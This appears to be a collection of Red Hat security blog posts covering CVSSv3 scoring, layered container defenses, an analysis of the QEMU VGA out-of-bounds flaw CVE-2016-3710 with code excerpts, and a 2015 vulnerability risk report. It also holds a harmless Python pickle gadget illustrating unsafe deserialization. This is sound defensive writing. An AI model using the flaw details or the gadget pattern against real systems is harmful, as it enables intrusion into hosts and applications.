    There is one last thing to note, however. The API, at this time, is in beta, and the structure of the content, including how it is searched, may change at any time without prior notification. We will only be supporting this one version of the API for now; however, if we make any changes we will note them in the documentation.

    For further information and instructions on how to use the API, please visit the Security Data API documentation. If you encounter an error in any of the data, please contact us and let us know.

    Posted: 2016-06-23T13:30:00+00:00
  • How Red Hat uses CVSSv3 to Assist in Rating Flaws

    Authored by: Christopher Robinson

    Humans have been measuring risk since the dawn of time. "I'm hungry, do I go outside my awesome cave here and forage for food? There might be something bigger, scarier, and hungrier than me out there...maybe I should wait?" Successfully navigating through life is a series of Risk/Reward calculations made each and every day. Sometimes, ideally, the choices are small ("Do I want fries with that?") while others can lead to catastrophic outcomes if the scenario isn't fully thought-through and proper mitigations put into place.

    Several years ago, Red Hat began publishing a CVSS score along with our own impact rating for security flaws that affected Red Hat products. CVSS stands for Common Vulnerability Scoring System and is owned and managed by FIRST.Org. FIRST is a non-profit organization based in the United States, and is dedicated to assisting incident response teams all over the globe. CVSS provides a numeric score of a vulnerability ranging from 0.0 up to 10.0. While not perfect, it is additional feedback that can be taken when trying to evaluate the urgency with which a newly-delivered patch must be deployed in your environment. The v2 incarnation of the system, while a nice move in the direction of quantitative analysis, had many rough edges and did not accurately depict many of the more modern computing scenarios under which our customers deploy technology.

    Last year, in 2015, the FIRST organization, stewards of the CVSS scoring system (along with several other useful assessment tools) published the next generation of CVSS: version 3. v3 gives a security practitioner better dials and adjustments to get a more accurate representation of a risk presented by a software flaw. Using CVSSv2, it was challenging to express how software was vulnerable when the underlying host/operating system was only partially/minimally impacted. CVSSv3 addresses this issue with updates to improve the possible values for impact metrics and introduces a new metric called Scope.

    An important conceptual change in CVSSv3 is the ability to score vulnerabilities that exist in one software component (now referred to as the vulnerable component) but which impact a separate software, hardware, or networking component (now referred to as impacted component).

    It is important to note that Red Hat uses CVSS scores solely as a guideline and we provide severity ratings of vulnerabilities in our products using a four-point scale based on impact. For more information specific to how Red Hat rates flaws (which also illustrates how we use CVSS as a guideline) please see: https://access.redhat.com/security/updates/classification/ .

    CVSSv3 now also provides a standard mapping from numeric scores to severity rating terms: None, Low, Medium, High and Critical. These numbers are very useful in starting to understand the risks involved, but ultimately they are one of several factors that goes into Red Hat’s severity rating, which may not always dictate what the final rating is.
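    That standard mapping from numeric scores to rating terms can be expressed directly; the ranges below follow the FIRST CVSSv3 specification:

```python
def cvss3_rating(score: float) -> str:
    """Map a CVSSv3 numeric base score to its qualitative severity rating."""
    if score == 0.0:
        return "None"
    if score <= 3.9:
        return "Low"
    if score <= 6.9:
        return "Medium"
    if score <= 8.9:
        return "High"
    return "Critical"
```

    Note again that this qualitative rating is distinct from Red Hat's own four-point impact scale, which considers factors beyond the CVSS score.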

    The Base Metrics now are:

    • Attack Vector (AV) - Expresses the "remoteness" of the attack and how the vulnerability is exploited.
    • Attack Complexity (AC) - Speaks to how hard the attack is to execute and what factors are needed for it to be successful. (The older Access Complexity metric is now split into Attack Complexity and User Interaction.)
    • User Interaction (UI) - Determines whether the attack requires an active human participant or whether the attack can be fully automated.
    • Privileges Required (PR) - Documents the level of user authentication required for attack to be successful (replaces older Authentication metric).
    • Scope (S) - Determines whether an attacker can affect a component that has a different level of authority.

    It’s important to note that User Interaction is now separate from Attack Complexity. In CVSSv2 it was not easy to determine if there was any user interaction required from the attack complexity metric alone, but with CVSSv3, it’s scored as a separate metric, making it more explicit what part of the scoring metric is related to user interaction.

    One question that must always be answered is, what kind of damage can be done if an attack is successfully executed? This is still measured by the CIA triad (Confidentiality, Integrity, Availability) however the values are now "None" to "Low" to "High" rather than “None” to “Partial” to “Complete” as they are in CVSSv2.

    • Confidentiality (C) - Determines whether data can be disclosed to non-authorized parties, and if so to what level.
    • Integrity (I) - This measures how trustworthy the data is and how far it can be trusted to not be modified by unauthorized users.
    • Availability (A) - This metric is concerned with data or services being accessible to authorized users when they need to access it.

    The CVSSv3 standard also includes the ability to measure compensating controls that might exist in an environment, as well as factors that change over the timeline of an attack. These are measured by the Temporal and Environmental metrics. Red Hat cannot speak to countermeasures that may or may not exist in a customer's network, and therefore will not publish scores based on these dimensions. To truly measure the residual level of risk in your environment, you may wish to use these metrics when communicating vulnerabilities within your organization.

    Complete descriptions of the new metrics can be found at: https://www.first.org/cvss/user-guide.

    When using these new criteria, Red Hat will continue to evaluate the risks that vulnerabilities bring based on the context of how the flaw adversely affects the component in relation to other products. Sometimes Red Hat's CVSSv3 scoring may differ from other organizations' ratings. For open source software shipped by multiple vendors, the CVSSv3 base scores may vary for each vendor's version, depending on the version they ship, how they ship it, the platform, and even how the software is compiled. This makes scoring of vulnerabilities difficult for third-party vulnerability databases, such as NVD, which can give only a single CVSSv3 base score to each vulnerability. More details can be found by reading CVSSv3 Base Metrics.

    To illustrate some of the differences between the old method and the new method, we provide the following examples:

    Flaw type CVSSv3 Metrics CVSSv2 Metrics (for comparison)
    Many XSS, CSRF 6.1/CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 4.3/AV:N/AC:M/Au:N/C:N/I:P/A:N
    NULL dereference C:N/I:N/A:L C:N/I:N/A:P
    info leak C:L/I:N/A:N C:P/I:N/A:N
    tempfile/symlink C:N/I:L/A:N C:N/I:P/A:N
    most wireshark flaws 6.5/CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 2.9/AV:A/AC:M/Au:N/C:N/I:N/A:P
    most browser ACEs 7.3/CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 6.8/AV:N/AC:M/Au:N/C:P/I:P/A:P
    local kernel null ptr -> root 8.4/CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 7.2/AV:L/AC:L/Au:N/C:C/I:C/A:C
    local kernel DoS 5.5/CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 4.9/AV:L/AC:L/Au:N/C:N/I:N/A:C
    local network kernel -> root 8.8/CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 8.3/AV:A/AC:L/Au:N/C:C/I:C/A:C
    local network kernel DoS 6.5/CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 6.1/AV:A/AC:L/Au:N/C:N/I:N/A:C
    local kernel infoleak 3.3/CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 1.9/AV:L/AC:M/Au:N/C:P/I:N/A:N
    remote kernel -> root 9.8/CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 10.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    remote kernel DoS 7.5/CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 7.8/AV:N/AC:L/Au:N/C:N/I:N/A:C
    wireshark buffer overflow 6.3/CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 5.4/AV:A/AC:M/Au:N/C:P/I:P/A:P
    wireshark null ptr deref 4.3/CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 2.9/AV:A/AC:M/Au:N/C:N/I:N/A:P
    root password leak C:H/I:N/A:N C:P/I:N/A:N
    SSL cert verification issues 3.7/CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N (typical, I:L) 4.3/AV:N/AC:M/Au:N/C:N/I:P/A:N (typical, I:P)
    Java deserialization RCE 7.3/CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 7.5/AV:N/AC:L/Au:N/C:P/I:P/A:P
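    The CVSSv3 vectors in the table can be checked mechanically. The following is a minimal sketch of the CVSSv3.0 base score equation, with metric coefficients taken from the FIRST specification (Temporal and Environmental metrics are omitted, as Red Hat does not publish them):

```python
import math

# Metric weights from the CVSSv3.0 specification
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
CIA = {"N": 0.0, "L": 0.22, "H": 0.56}

def cvss3_base_score(vector: str) -> float:
    """Compute a CVSSv3.0 base score from a vector string such as
    'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'."""
    m = dict(part.split(":") for part in vector.split("/")[1:])
    changed = m["S"] == "C"  # Scope metric
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    if impact <= 0:
        return 0.0
    score = min((1.08 if changed else 1.0) * (impact + exploitability), 10)
    return math.ceil(score * 10) / 10  # round up to one decimal place
```

    For example, the XSS/CSRF vector in the first row evaluates to 6.1, and the remote-kernel-to-root vector to 9.8, matching the table.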

    For the JBoss Middleware suite, most scoring will be unaffected as the scoring for JBoss Middleware in CVSSv2 always related to the JBoss Middleware product itself, not the overall operating system. That won’t change with the introduction of the scope metric in CVSSv3. The scope of a vulnerability's impact will be related to all things authorized by the system user running the JBoss Middleware product, not the Java Virtual Machine, or a specific application deployed to the product.

    It is important to highlight, however, that with CVSSv2 other Red Hat products were scored based on the impact to the entire product, and not individual components. This is a very obvious change in CVSSv3 that will cause scores for products like Red Hat Enterprise Linux to be higher, sometimes substantially so, than they would have been rated using CVSSv2. This will result in our scores being closer to those published by other vendors or organizations, however differences (as outlined above) are still taken into account and may cause some slight variation.

    Further information on Red Hat impact ratings and how CVSSv3 is used can be found on our Issue Severity Classification page. CVSSv3 base metrics will be available for all vulnerabilities from June 2016 onwards. These scores are found on the CVE pages (linked to from the References section of each Red Hat Security Advisory) and also from our Security Measurements page.

    So now, forewarned being forearmed, you can feel just a little bit safer crawling out from your cave to venture forth. With a clearer understanding of the risks that could occur, you can journey out into the big, wide world better prepared!

    Posted: 2016-06-21T20:16:50+00:00
  • The Answer is always the same: Layers of Security

    Authored by: Daniel Walsh

    There is a common misconception that now that containers support seccomp we no longer need SELinux to help protect our systems. WRONG. The big weakness of containers is that container processes can interact with the host kernel and the host file systems. Securing container processes is all about shrinking the attack surface on the host OS, and more specifically on the host kernel.

    seccomp does a great job of shrinking the attack surface on the kernel. The idea is to limit the number of syscalls that container processes can use. It is an awesome feature. For example, on an x86_64 machine, there are around 650 system calls. If the Linux kernel has a bug in any one of these syscalls, a process could get the kernel to turn off security features and take over the system, i.e. break out of confinement. If your container does not run 32-bit code, you can turn on seccomp and eliminate all 32-bit syscalls, basically cutting the number of syscalls in half. This means that if the kernel had a bug in a 32-bit syscall that allowed a process to take over the system, that syscall would not be available to the processes in your container, and the container would not be able to break out. We also eliminate a lot of other syscalls that we do not expect processes inside of a container to call.
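    As an illustration of the whitelist approach, a Docker-style seccomp profile denies every syscall by default and allows only a named set; the fragment below is a hypothetical, heavily abbreviated sketch, not a usable profile:

```json
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64"],
  "syscalls": [
    {
      "names": ["read", "write", "open", "close", "exit_group"],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
```

    Restricting the architectures list to SCMP_ARCH_X86_64 is what drops the 32-bit syscall table described above.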

    But seccomp is not enough

    This still means that if a bug remains in the kernel that can be triggered through one of the roughly 300 remaining syscalls, a container process can still take over the system and/or create havoc. Just having open/read/write/ioctl on things like files and devices could allow a container process to break out. And if it breaks out, it would be able to write all over the system.

    You could continue to shrink the seccomp syscall table to such a degree that processes cannot escape, but at some point it would also prevent the container processes from getting any real work done.

    Defense in Depth

    As usual, any single security mechanism by itself will not fully protect your containers. You need lots of security mechanisms to control what a process can do inside and outside a container.

    • Read-Only file systems. Prevent open/write on kernel file systems. Container processes need read access to kernel file systems like /proc, /sys, /sys/fs ... But they seldom need write access.

    • Dropping privileged process capabilities. This can prevent things like setting up the network or mounting file systems, (seccomp can also block some of these, but not as comprehensively as capabilities).

    • SELinux. Controls which file system objects (files, devices, sockets, and directories) a container process can read/write/execute. Since processes in a container need the open/read/write/exec syscalls, SELinux controls which file system
      objects they can interact with. I have heard a great analogy: SELinux is telling people which people they can talk to; seccomp is telling them what they can say.

    • prctl(NO_NEW_PRIVS). Prevents privilege escalation through the use of setuid applications. Running your container
      processes without privileges is always a good idea, and this keeps the processes non-privileged.

    • PID Namespace. Makes it harder to see other processes on the system that are not in your container.

    • Network Namespace. Controls which networks your container processes are able to see.

    • Mount Namespace. Hides large parts of the system from the processes inside of the container.

    • User Namespace. Helps remove remaining system capabilities. It can allow you to have privileges inside of your containers namespaces, but not outside of the container.

    • kvm. If you can find some way to run containers in a kvm/virtualization wrapper, this would be a lot more secure. (ClearLinux and others are working on this).

    The more Linux security services that you can wrap around your container processes the more secure your system will be.

    Bottom Line

    It is the combination of all of these kernel services along with administrators continuing to maintain good security practices that begin to keep your container processes contained.

    Posted: 2016-05-25T13:30:00+00:00
  • CVE-2016-3710: QEMU: out-of-bounds memory access issue

    Authored by: Prasad Pandit

    Quick Emulator (aka QEMU) is an open source systems emulator. It emulates various processors and their accompanying hardware peripherals, such as disks, serial ports, and NICs. A serious out-of-bounds read/write vulnerability in the Video Graphics Array (VGA) emulator was discovered and reported by Wei Xiao and Qinghao Tang of the Marvel Team at 360.cn Inc. This vulnerability is formally known as Dark Portal. In this post we'll see how Dark Portal works and how to mitigate it.

    VGA is a hardware component primarily responsible for drawing content on a display device. This content could be text or images at various resolutions. The VGA controller comes with its own processor (GPU) and its own RAM, the size of which varies from device to device. The VGA emulator in QEMU comes with a default memory size of 16 MB. The system's CPU maps this memory, or parts of it, to supply graphical data to the GPU.

    The VGA standard has evolved, and many extensions to it have been devised to support higher resolutions or new hardware. The VESA BIOS Extensions (VBE) is a software interface implemented in the VGA BIOS, and the Bochs VBE extension is a set of registers designed to support Super VGA (SVGA) hardware. The QEMU VGA emulator implements both VBE and the Bochs VBE extensions. It provides two ways to access its video memory:

    • Linear frame buffer: The entire video RAM is accessed by the CPU like a byte-addressed array in C.
    • Bank switching: A chunk (or bank) of 64 KB of video memory is mapped into the host's memory. The host CPU can slide this 64 KB window to access other parts of the video memory.

    VBE has numerous registers holding parameters such as memory bank size and offset. These registers can be manipulated using the VGA I/O port read/write functions. The VBE_DISPI_INDEX_BANK register holds the offset address of the currently used bank (or window) of VGA memory. In order to update a display pixel, the GPU must calculate its location on the screen and its offset within the current memory bank.

    QEMU VGA emulator in action:

    In QEMU's VGA emulator, a guest user can set the bank offset via the VBE_DISPI_INDEX_BANK register through the vbe_ioport_write_data() routine:

            void vbe_ioport_write_data() {
                ...
                case VBE_DISPI_INDEX_BANK:
                    ...
                    s->bank_offset = (val << 16);
            }
    

    The VGA read and write functions vga_mem_readb() and vga_mem_writeb() compute the pixel location using the supplied address and the bank_offset value:

            uint32_t vga_mem_readb/writeb(VGACommonState *s, hwaddr addr, ...) {
                ...
                switch(memory_map_mode) {
                case 1:
                    ...
                    addr += s->bank_offset;
                    break;
                 ...
                 /* standard VGA latched access */
                 s->latch = ((uint32_t *)s->vram_ptr)[addr];
            }
    

    The out-of-bounds read/write occurs because the byte-addressed (uint8_t *) video memory is accessed as if it were an array of double words (uint32_t *). Because indexing a uint32_t pointer scales the offset by four, the computed pixel address can land beyond the 16 MB VGA memory.
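    The flawed address computation can be modelled with simple arithmetic. The sketch below is a hypothetical model of the logic shown above (the 16 MB size is QEMU's default; the factor of four comes from the uint32_t cast):

```python
VRAM_SIZE = 16 * 1024 * 1024  # QEMU's default VGA memory (16 MB)

def latched_access_byte_offset(addr, bank_register_value):
    """Model of the vga_mem_readb/writeb address computation: the guest
    controls the bank register, and the uint32_t cast scales the final
    index by sizeof(uint32_t) == 4."""
    bank_offset = bank_register_value << 16   # as in vbe_ioport_write_data()
    addr += bank_offset                       # memory_map_mode case 1
    return addr * 4                           # ((uint32_t *)vram)[addr]

# A bank register value still inside the 16 MB window already pushes
# the scaled byte offset well past the end of video RAM:
overflow = latched_access_byte_offset(0, 0xff) - VRAM_SIZE
```

    In other words, even bank offsets that look in-bounds as byte addresses become out-of-bounds once multiplied by four, which is exactly the window the guest abuses.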

    Impact:

    This issue affects all QEMU/KVM and Xen guests in which the VGA emulator is enabled. Depending on where the out-of-bounds access lands in host memory, it could lead to information disclosure or crash the QEMU process, resulting in a denial of service (DoS). It could potentially be leveraged to execute arbitrary code with the privileges of the QEMU process on the host.

    Mitigation:

    The sVirt and seccomp functionality used to restrict the privileges and resource access of the host's QEMU process may mitigate the impact of successful exploitation of this issue. A possible policy-based workaround is to avoid granting untrusted users administrator privileges within guests.

    Conclusion:

    VGA VBE registers can be manipulated by a privileged user inside the guest, leading to out-of-bounds memory access in the QEMU process on the host, essentially making this an attack by a guest on the virtualisation host.

    Posted: 2016-05-11T13:30:00+00:00
  • Red Hat Product Security Risk Report: 2015

    Authored by: Red Hat Product...

    This report takes a look at the state of security risk for Red Hat products for calendar year 2015. We look at key metrics, specific vulnerabilities, and the most common ways users of Red Hat products were affected by security issues.

    Our methodology is to look at how many vulnerabilities we addressed and their severity, then look at which issues were of meaningful risk, and which were exploited. All of the data used to create this report is available from public data maintained by Red Hat Product Security.

    Red Hat Product Security assigns a Common Vulnerabilities and Exposures (CVE) name to every security issue we fix. If we fix a bug that later turns out to have had a security implication we’ll go back and assign a CVE name to that issue retrospectively. Every CVE fixed has an entry in our public CVE database in the Red Hat Customer Portal as well as a public bug that has more technical detail of the issue. Therefore, for the purposes of this report we will equate vulnerabilities to CVEs.

    Note: Vulnerability counts can be used for comparing Red Hat issues within particular products or dates because we apply a consistent methodology on how we allocate names and how we score their severity. You should not use vulnerability count data (such as the number of CVEs addressed) to compare with any other product from another company, because the methodology used to assign and report on vulnerabilities varies. Even products from different vendors that are affected by the same CVE can have variance in the severity of the CVE given the unique way the product is built or integrated.

    Vulnerabilities

    Across all Red Hat products, and for all issue severities, we fixed more than 1300 vulnerabilities by releasing more than 600 security advisories in 2015. At first that may seem like a lot of vulnerabilities, but for a given user only a subset of those issues will be applicable for the products and versions of the products in use. Even then, within a product such as Red Hat Enterprise Linux, not every package is installed in a default or even likely installation.

    Red Hat rates vulnerabilities using a 4-point scale designed to be an at-a-glance guide to the amount of concern Red Hat has for each security issue. This scale is designed to align as closely as possible with similar scales from other open source groups and enterprise vendors, such as Microsoft. The severity levels help users determine which advisories matter most. Providing a prioritised risk assessment helps customers understand and better schedule upgrades to their systems, and make a more informed decision about the risk each issue places on their unique environment.

    Since 2009, we have also published Common Vulnerability Scoring System (CVSS) scores for every vulnerability addressed, to aid customers who use CVSS scoring in their internal processes. However, CVSS scores have some limitations, and we do not use CVSS as a way to prioritise vulnerabilities.

    The 4 point scale rates vulnerabilities as Low, Moderate, Important, or Critical.

    Vulnerabilities rated Critical in severity can pose the most risk to an organisation. By definition, a Critical vulnerability is one that could potentially be exploited remotely and automatically by a worm. However we, like other vendors, also stretch the definition to include those flaws that affect web browsers or plug-ins where a user only needs to visit a malicious (or compromised) website in order to be exploited. These flaws actually account for the majority of the Critical issues fixed, as we will show in this report. If you're using a Red Hat product that does not have a desktop, for example, you'll be affected by far fewer Critical issues.

    The table below gives some examples for advisory and vulnerability counts for a subset of products and product families. A given Red Hat advisory may fix multiple vulnerabilities across multiple versions of a product. Therefore, a count of vulnerabilities can be used as an estimate of the amount of effort in understanding the issues and fixes. A count of advisories can be used as an estimate of the amount of effort to understand and deploy updates.

    One product broken out in the table is Red Hat Enterprise Linux 6. During Red Hat Enterprise Linux 6 installation, the user gets a choice of installing either the default selection of packages, or making a custom selection. If the user installs a “default” “server” and does not add any additional packages or layered products, then in 2015 there were just 6 Critical and 19 Important security advisories applicable to that system (and 29 advisories that also addressed moderate/low issues).

    Where there are more advisories shown than vulnerabilities (such as for OpenStack), this is because the same vulnerability may affect multiple currently supported versions of the product, and each version gets its own security advisory.

    In 2015, across all Red Hat products, there were 112 Critical Red Hat security advisories released addressing 373 Critical vulnerabilities. 82% of the Critical issues had updates available to address them the same or next day after the issue was public. 99% of Critical vulnerabilities were addressed within a week of the issue being public.

    Looking at just the subset of issues affecting base Red Hat Enterprise Linux releases, there were 46 Critical Red Hat security advisories released addressing 61 Critical vulnerabilities. 96% of the Critical issues had updates available to address them the same or next day after the issue was public.

    For Red Hat Enterprise Linux, server installations will generally be affected by far fewer Critical vulnerabilities, just because most Critical vulnerabilities occur in browsers or browser components. A great way to reduce risk when using our modular products is to make sure you install the right variant, and review the package set to remove packages you don’t need.

    Vulnerability trending

    The number of vulnerabilities addressed by Red Hat year on year is increasing as a function of new products and versions of products being continually added. However, for any given version of a product we find that the number of vulnerabilities being fixed actually decreases over time. This is influenced by Red Hat backporting security fixes.

    We use the term backporting to describe the action of taking a fix for a security flaw out of the most recent version of an upstream software package and applying that fix to an older version of the package we distribute. Backporting is common among vendors like Red Hat and is essential to ensuring we can deploy automated updates to customers with minimal risk.

    The trends can be investigated using our public data, and from time to time we do Risk Reports that delve into a given product and version. For example see our Red Hat Enterprise Linux 6.5 to 6.6 Risk Report.

    What issues really mattered in 2015

    In 2014, the OpenSSL Heartbleed vulnerability started a trend of branding vulnerabilities, changing the way security vulnerabilities affecting open source software were reported and perceived. Vulnerabilities are found and fixed all the time, and just because a vulnerability gets a catchy name, fancy logo, or media attention doesn’t mean it poses real risk to users.

    So let’s take a chronological tour through 2015 to see which issues got branded or media attention, but more importantly which issues actually mattered for Red Hat customers.

    “Ghost” (January 2015) CVE-2015-0235

    A bug was found affecting certain function calls in the glibc library. A remote attacker that was able to make an application call to an affected function could execute arbitrary code. While a proof of concept exploit is available, as is a Metasploit module targeting Exim, not many applications were found to be vulnerable in a way that would have allowed remote exploitation.

    Red Hat Enterprise Linux versions were affected. This was given Critical impact, and updates were available the same day the issue was public. This issue was given enhanced coverage in the Red Hat Customer Portal, with a banner on all pages and a customer outreach email campaign.

    “Freak” (March 2015) CVE-2015-0204

    A flaw was found in the OpenSSL cryptography library where clients accepted EXPORT-grade (insecure) keys even when the client had not initially asked for them. This could have been exploited via a man-in-the-middle attack that downgrades the connection to a weak key, factors the key, and then decrypts communication between the client and the server. Like the branded OpenSSL issues from 2014, such as Poodle and CCS Injection, this issue is hard to exploit as it requires a man-in-the-middle attack. We’re therefore not aware of active exploitation of this issue.

    Red Hat Enterprise Linux versions were affected. This was given Moderate impact, and updates were available within a few weeks of the issue being public.

    ABRT (April 2015) CVE-2015-3315

    ABRT (Automatic Bug Reporting Tool) is a tool to help users detect defects in applications and create a bug report. ABRT was vulnerable to multiple race condition and symbolic link flaws. A local attacker could have used these flaws to potentially escalate their privileges on an affected system to root.

    This issue affected Red Hat Enterprise Linux 7. This was given Important impact, and updates were made available. Other products and versions of Red Hat Enterprise Linux were either not affected, or not vulnerable to privilege escalation. A working public exploit is available for this issue.

    JBoss Operations Network open APIs (April 2015) CVE-2015-0297

    Red Hat JBoss Operations Network is a middleware management solution that provides a single point of control to deploy, manage, and monitor JBoss Enterprise Middleware, applications, and services. The JBoss Operations Network server did not correctly restrict access to certain remote APIs which could have allowed a remote, unauthenticated attacker to execute arbitrary Java methods. We’re not aware of active exploitation of this issue.

    This issue affected versions of JBoss Operations Network. It was given Critical impact, and updates were made available within a week of the issue being public.

    “Venom” (May 2015) CVE-2015-3456

    Venom was a branded flaw which affected QEMU. A privileged user of a guest virtual machine could use this flaw to crash the guest or, potentially, execute arbitrary code on the host with the privileges of the host’s QEMU process corresponding to the guest.

    A number of Red Hat products were affected and updates were released the same day as the issue was public. Red Hat products by default would block arbitrary code execution as SELinux sVirt protection confines each QEMU process. We therefore are not aware of any exploitation of this issue.

    This issue was given enhanced coverage in the Red Hat Customer Portal, with a banner on all pages and a customer outreach email campaign.

    “Logjam” (May 2015) CVE-2015-4000

    TLS connections using the Diffie-Hellman key exchange protocol were found to be vulnerable to an attack in which a man-in-the-middle attacker could downgrade vulnerable TLS connections to weak cryptography which could then be broken to decrypt the connection.

    This issue affected various cryptographic libraries across several Red Hat products. It was rated Moderate impact and updates were made available.

    Like Poodle and Freak, this issue is hard to exploit as it requires a man-in-the-middle attack. We’re not aware of active exploitation of this issue.

    libuser privilege escalation (July 2015) CVE-2015-3246

    The libuser library implements an interface for manipulating and administering user and group accounts. Flaws in libuser could allow authenticated local users with shell access to escalate privileges to root.

    Red Hat Enterprise Linux 6 and 7 were affected. This issue was rated Important impact, and updates were made available the same day as the issue was made public. Red Hat Enterprise Linux 5 was affected, and a mitigation was published. A public exploit exists for this issue.

    BIND DoS (July 2015) CVE-2015-5477

    A flaw in the Berkeley Internet Name Domain (BIND) allowed a remote attacker to cause named (functioning as an authoritative DNS server or a DNS resolver) to exit, causing a denial of service against BIND.

    This issue affected the versions of BIND shipped with all versions of Red Hat Enterprise Linux. This issue was rated Important impact, and updates were available the same day as the issue was made public. A public exploit and a Metasploit module exist for this issue.

    Several other similar flaws in BIND leading to denial of service were found and addressed through the year, such as CVE-2015-8704, CVE-2015-8000, and CVE-2015-5722. Public exploits exist for some of these issues.

    Firefox local file stealing via PDF reader (August 2015) CVE-2015-4495

    A flaw in Mozilla Firefox could allow an attacker to access local files with the permissions of the user running Firefox. Public exploits exist for this issue, including one that is part of Metasploit and specifically targets Linux systems.

    This issue affected the Firefox packages shipped with versions of Red Hat Enterprise Linux. It was rated Important impact, and updates were available the day after the issue was public.

    Firefox add-on permission warning (August 2015) CVE-2015-4498

    Mozilla Firefox normally warns a user when trying to install an add-on if initiated by a web page. A flaw allowed this dialog to be bypassed. We’re not aware that this issue has been exploited.

    This issue affected Firefox shipped with Red Hat Enterprise Linux versions. It was rated Important impact, and updates were available the same day as the issue was public.

    Java Deserialization (November 2015) CVE-2015-7501

    An issue was found in Java Object Serialization affecting the JMXInvokerServlet interface. It could lead to arbitrary code execution when Java objects from untrusted sources were deserialized and the Apache commons-collections library, which contains certain risky classes, was on the classpath.

    This issue impacted many products in the JBoss Middleware suite and updates were made available in November and the following months. Direct exploitation of this vulnerability requires some means of getting an application to accept an object containing one of the risky classes.
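    The Java specifics differ, but the underlying hazard of deserializing untrusted data can be sketched in Python with the pickle module: the byte stream itself can direct which callable runs during deserialization. The Gadget class below is purely illustrative, not the actual commons-collections gadget.

```python
import pickle

# Illustrative only: a class whose pickled payload instructs the
# deserializer to call an arbitrary callable (here, harmlessly, list()).
class Gadget:
    def __reduce__(self):
        # A real attack would name something far more dangerous here.
        return (list, (("code", "ran"),))

payload = pickle.dumps(Gadget())
result = pickle.loads(payload)  # list() is invoked during loading
print(result)  # ['code', 'ran'] -- no Gadget instance comes back
```

    The defence, as with the Java flaw, is never to deserialize untrusted input with a mechanism that can instantiate arbitrary classes.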

    Grub2 password bypass (December 2015) CVE-2015-8370

    A flaw was found in the way grub2 handled backspace characters entered at username and password prompts. An attacker with access to the system console could use this flaw to bypass grub2 password protection.

    This issue only affected Red Hat Enterprise Linux 7. It was rated Moderate severity, and updates were made available within a week. Steps on how to exploit this issue are public.

    Various flaws in software in supplementary channels (various dates)

    Red Hat provides some packages which are not open source software in supplementary channels for users of Red Hat Enterprise Linux. This channel contains software such as Adobe Flash Player, IBM Java, Oracle Java, and Chromium browser.

    A large number of Critical flaws affected these packages. For example, for Adobe Flash Player in 2015, we issued 15 Critical advisories to address nearly 300 Critical vulnerabilities. Linux exploits exist for some of these Critical vulnerabilities, with 5 having Metasploit modules. As these projects release security updates, we ship appropriately updated packages to customers.

    The issues examined in this section were included because they were meaningful. This includes the issues that are of high severity and likely to be exploited (or already have a public working exploit), as well as issues that were highly visible or branded (with a name or logo or enhanced media attention), regardless of their severity. See the Venn diagram below for our opinion on the intersection.

    Lower risk issues with increased customer attention

    Another way we gauge the level of customer concern around an issue is to measure web traffic, specifically how many page views each of the vulnerability (CVE) pages gets in the Red Hat Customer Portal.

    The graph above gives an indication of customer interest in given vulnerabilities. Many of the top issues were highlighted earlier in this report. Of the rest, the top viewed issues were ones predominantly affecting Red Hat Enterprise Linux:

    • A flaw in Samba, CVE-2015-0240, where a remote attacker could potentially execute arbitrary code as root. Samba servers are likely to be internal and not exposed to the internet, limiting the attack surface. No exploits that lead to code execution are known to exist, and some analyses have shown that creation of such a working exploit is unlikely.
    • Various flaws in OpenSSL. After high-profile issues such as Heartbleed and Poodle in previous years, OpenSSL issues tend to attract increased customer interest independent of the actual severity or risk.
    • Two flaws in OpenSSH: CVE-2015-5600, which did not affect Red Hat products in a default configuration and was rated Low impact; and CVE-2015-5352, which affected some versions of Red Hat Enterprise Linux at Moderate impact.
    • Two flaws in the Red Hat Enterprise Linux kernel, both rated Important impact: CVE-2015-1805, which could allow a local attacker to escalate their privileges to root; and CVE-2015-5364, where a remote attacker able to send UDP packets to a listening server could cause it to crash. We are not aware of public exploits for either issue.
    • A Moderate rated flaw in the Apache web server CVE-2015-3183 which could lead to proxy smuggling attacks. We are not aware of a public exploit for this issue.

    The open source supply chain

    Red Hat products are based on open source software. Some Red Hat products contain several thousand individual packages, each of which is based on separate, third-party, software from upstream. While Red Hat engineers play a part in many upstream components, handling and managing vulnerabilities across thousands of third-party components is non-trivial.

    Red Hat has a dedicated Product Security team who monitor issues affecting Red Hat products and work closely with upstream projects. In 2015, more than 2000 vulnerabilities that potentially affected parts of our products were investigated, leading to fixes for 1363 vulnerabilities.

